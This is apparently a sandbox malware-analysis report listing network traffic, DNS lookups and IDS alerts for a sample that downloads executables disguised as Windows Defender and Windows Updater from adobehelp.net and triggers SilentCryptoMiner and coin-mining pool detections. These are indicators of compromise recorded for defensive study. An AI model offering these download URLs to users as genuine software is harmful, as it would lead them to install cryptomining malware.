- | - | POST | 200 | 40.126.31.2:443 | https://login.live.com/RST2.srf | US | xml | 10.3 Kb | unknown
- | - | POST | 200 | 20.190.159.131:443 | https://login.live.com/RST2.srf | US | xml | 10.3 Kb | unknown
- | - | POST | 200 | 20.190.159.75:443 | https://login.live.com/RST2.srf | US | xml | 11.0 Kb | unknown
- | - | GET | 200 | 188.114.96.3:443 | https://adobehelp.net/WindowsDefender.exe | US | executable | 123 Kb | unknown
- | - | GET | 200 | 188.114.96.3:443 | https://adobehelp.net/WindowsUpdater.exe | US | executable | 4.59 Mb | unknown
- | - | POST | 200 | 40.126.31.130:443 | https://login.live.com/RST2.srf | US | xml | 11.1 Kb | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2316 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
5596 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4064 | RUXIMICS.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 2.16.241.213:443 | www.bing.com | Akamai International B.V. | DE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
2316 | svchost.exe | 2.16.164.91:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted
5596 | MoUsoCoreWorker.exe | 2.16.164.91:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted
4064 | RUXIMICS.exe | 2.16.164.91:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted
4420 | svchost.exe | 40.126.31.128:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 51.124.78.146
whitelisted
www.bing.com
  • 2.16.241.213
  • 2.16.241.222
  • 2.16.241.218
  • 2.16.241.206
  • 2.16.241.211
  • 2.16.241.207
  • 2.16.241.205
  • 2.16.241.212
  • 2.16.241.219
whitelisted
google.com
  • 142.250.185.206
whitelisted
crl.microsoft.com
  • 2.16.164.91
  • 2.16.164.105
  • 2.16.164.90
  • 2.16.164.114
  • 2.16.164.129
  • 2.16.164.131
  • 2.16.164.113
  • 2.16.164.130
  • 2.16.164.89
  • 2.16.241.19
  • 2.16.241.12
whitelisted
login.live.com
  • 40.126.31.128
  • 20.190.159.68
  • 40.126.31.2
  • 20.190.159.130
  • 40.126.31.73
  • 20.190.159.2
  • 40.126.31.1
  • 20.190.159.0
whitelisted
watson.events.data.microsoft.com
  • 135.233.45.222
  • 135.234.160.246
whitelisted
client.wns.windows.com
  • 172.211.123.250
  • 172.211.123.248
  • 172.211.123.249
whitelisted
adobehelp.net
  • 188.114.97.3
  • 188.114.96.3
unknown
slscr.update.microsoft.com
  • 74.178.76.128
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 2.23.181.156
whitelisted

Threats

PID | Process | Class | Message
- | - | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP
- | - | Misc activity | ET INFO Packed Executable Download
- | - | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
- | - | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP
- | - | Misc activity | ET INFO Packed Executable Download
- | - | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2276 | svchost.exe | Crypto Currency Mining Activity Detected | ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)
2276 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Online Pastebin Text Storage
- | - | A Network Trojan was detected | ET MALWARE SilentCryptoMiner Agent Config Inbound
2276 | svchost.exe | Crypto Currency Mining Activity Detected | ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)
No debug info